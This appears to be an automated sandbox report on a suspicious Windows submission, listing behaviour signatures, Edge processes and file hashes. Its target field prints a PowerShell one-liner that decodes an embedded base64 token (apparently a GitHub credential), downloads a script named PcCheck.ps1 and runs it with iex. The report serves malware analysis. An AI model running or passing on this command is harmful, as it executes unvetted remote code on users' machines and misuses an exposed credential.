Analysis
-
max time kernel
240s -
max time network
300s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
-
submitted
02/09/2024, 20:33
General
-
Target
http://$t="Z2hwX2hLV2NjMk45bXc4aWJtR1BpdEdBbW9VSHhoVjBzQzBtaXBFbw=="; iwr -useb https://raw.githubusercontent.com/GuirellaGeneva/FYR/main/PcCheck.ps1 -Headers @{"Authorization"="Bearer $([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($t)))"} | iex
Malware Config
Signatures
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies registry class 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
-
Suspicious use of FindShellTrayWindow 25 IoCs
-
Suspicious use of SendNotifyMessage 12 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://$t="Z2hwX2hLV2NjMk45bXc4aWJtR1BpdEdBbW9VSHhoVjBzQzBtaXBFbw=="; iwr -useb https://raw.githubusercontent.com/GuirellaGeneva/FYR/main/PcCheck.ps1 -Headers @{"Authorization"="Bearer $([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($t)))"} | iex1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8e8a53cb8,0x7ff8e8a53cc8,0x7ff8e8a53cd82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:22⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4052 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4120 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4232 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2580 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=2992 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2572 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6188 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1912,9292814893755772175,14073925156530398937,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2600 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5b4ae6009e2df12ce252d03722e8f4288
SHA144de96f65d69cbae416767040f887f68f8035928
SHA2567778069a1493fdb62e6326ba673f03d9a8f46bc0eea949aabbbbc00dcdaddf9d
SHA512bb810721e52c77793993470692bb2aab0466f13ed4576e4f4cfa6bc5fcfc59c13552299feb6dfd9642ea07b19a5513d90d0698d09ca1d15e0598133929c05fe1
-
Filesize
152B
MD54bf4b59c3deb1688a480f8e56aab059d
SHA1612c83e7027b3bfb0e9d2c9efad43c5318e731bb
SHA256867ab488aa793057395e9c10f237603cfb180689298871cdf0511132f9628c82
SHA5122ec6c89f9653f810e9f80f532abaff2a3c0276f6d299dce1b1eadf6a59e8072ed601a4f9835db25d4d2610482a00dd5a0852d0ef828678f5c5ed33fe64dddca9
-
Filesize
1KB
MD5b485b65ba3d011b21068ea144d4f1a5f
SHA1c53498814a93fdb4bc46fe09a830bba5f7052b7a
SHA2560b6f7a3b23d712771d1c83edc37946a4200ef30ffda3154f83eb98668af73df8
SHA512061b2ae66a0d28ebc3fe94fc9a6e0351fbfdf7aa1e1af1468df31b1c345bbdbbf22edf45055fbb9b844bd3284fe404991fa876d182b390790badec45c6e55f70
-
Filesize
913B
MD5e35aa340f37346c746fe338af83cbc1f
SHA11c3c0d2f6ff147ff7da9bb9ab89997f5f4bccee0
SHA256d7b4ef7061c15f003eca7dd0f436aeb989fe01ff70a2542d674161ca02e3b4eb
SHA512b5e55f4516773479094765efbe3ed83fe3095c9f204b8d696241bc0fc7e129d0cb60cbeafff4ee6d193519032f0bfca655d51b8e46ef107e8ad22697af3930b6
-
Filesize
821B
MD506090f4385c5f26c510e37a29d8dccd2
SHA1692b81a36fb8cfea926f3a28c27a9e33a2e644e9
SHA2566a338a7254c789f3275493f667bbbe6c98f594603368897c84a5073504cbec27
SHA51297638a63b7f8c9e059a3980278f115708603c5dcfa74bec98efe977aca3052b38cad6fa1e2f609397da7e64f3fc800562886215d2882622750a5e8b3b084c833
-
Filesize
5KB
MD50e9950d2d3c0a3b536d37afff8c740a0
SHA1aef994ded8144dbb4aa317c27508d1285a5d9250
SHA2566f7a711168ef5c8fc2755f38a32310dc47235b993121c4d60ea010fc358d1d3c
SHA512e3011220ead177d2dbc7f5c201e73894d69d6cf25a086499288efa83769ecbc074d709777b3c97dac78430629bb70ce369bb10fff5ca1f4d513b1de978ec1fe5
-
Filesize
6KB
MD56c6f4f5629fd16063872fc3e06528d04
SHA12845b88f79b0682c6c21f626e87f7891d7de1666
SHA25622b61f4c2577830aa999ec66fa4124fe480e36856c32420821bda98746cf70e0
SHA512e9788c19b62c909fb678db6d425139435e0d4f33cb7f94c5e7c1f12d4a248a2a3f9debfcff89a7a38f7708a5be7e649ee7cd791cde3fcab3d1f6439450ad2a6b
-
Filesize
6KB
MD5634bc2bd127c06fc3cc61d1323631363
SHA163ff5ba5276f3f53262781e2038e62ef1f9a029c
SHA2564cb6118df76862a58b7f2e15e844fd2fd58c659d067abdb46be808a9e4c59493
SHA512d91f5d0b4aeb0cd6c109279f694a08545e2c0472fbbc82ad024f79c7bcecb4334326acb0d36df17d3486678678d6b9ab4374babd757cf29deca1096a7327dd0c
-
Filesize
5KB
MD5d8cfe69fe7074c0e0a7ab467c00dcbc2
SHA1f75b5def28c9b417334699ab6dd5f2a449d01540
SHA25614a61663f9b782670ce580fa2961be139874dab09fba33cdf086368b674e58da
SHA51238975412f6b6f4a85e9de84858301ea761fe9b4e2decc6be604a9d045c0e28847e227eb22673635afeb421668139a0fd5d3eded1e2acd3052298a4de489181e5
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
10KB
MD5318865c9214028303eba003040a8a41e
SHA1e874b8667ec693ea8056d5741ad1e5b51b4b3a97
SHA256ef8a9e499c59abd60baa758aa8cfca528fa269433994c247842eb68febdff17d
SHA51292913cc6359ec85e3b5d8607befabcb30ff767cb77e2f4a7d3c2f4cf94b3faebc8c9edeeab71773192f040402e245f7bf6dc3389fb8d24fc258d563c6a801c1c
-
Filesize
10KB
MD5434ef72e30a326fe7b48770a21ceb924
SHA13954a8854a75eb4fff522565fe732d3c6a861fcf
SHA256a2f517662f719eb46ac6165e3f4bd857866c6e65372af0c893ec596a09b82f02
SHA512d75302c4a3a922dcb8942362da006adec25b9233321638e913a2abf6065f13a423e49bf65e1b701b488b74e02d032f3515139fe47354c36957006d1717fa675e
-
Filesize
11KB
MD54ecb1f6be4c2a24644cc3ab953896613
SHA1ca7fe9334940245e17354ae1b21028ef93bf899d
SHA25657e90afd80329f9a9d1a28f32d27d8d7420f973a5b9ebd7400f48a3735039600
SHA512cdedba31c9da7483b483850e010ad159334ca990abdb67538bc5c28fe06354ef3f7acf5f159f9a4fd8663bf60437974d577e84a1e80cf088371e3b09fd1d3114
-
Filesize
10KB
MD5c3e08121cabb9380e3d50cadde97d53a
SHA10e666954e83e97e3883e52092fe2be88a520e8f8
SHA25676e1d3ab7320c4b863adb091b5b77205d81e13eafb539a18ebe3d8ea46b29433
SHA5129a6ef7710781d2f3a1f873129b21990548c1b275720080d87fe4051b464b0aef4ad8625656c388a65163563c6fb2086c29c01ba5f518c5b9679e7227fcc7941f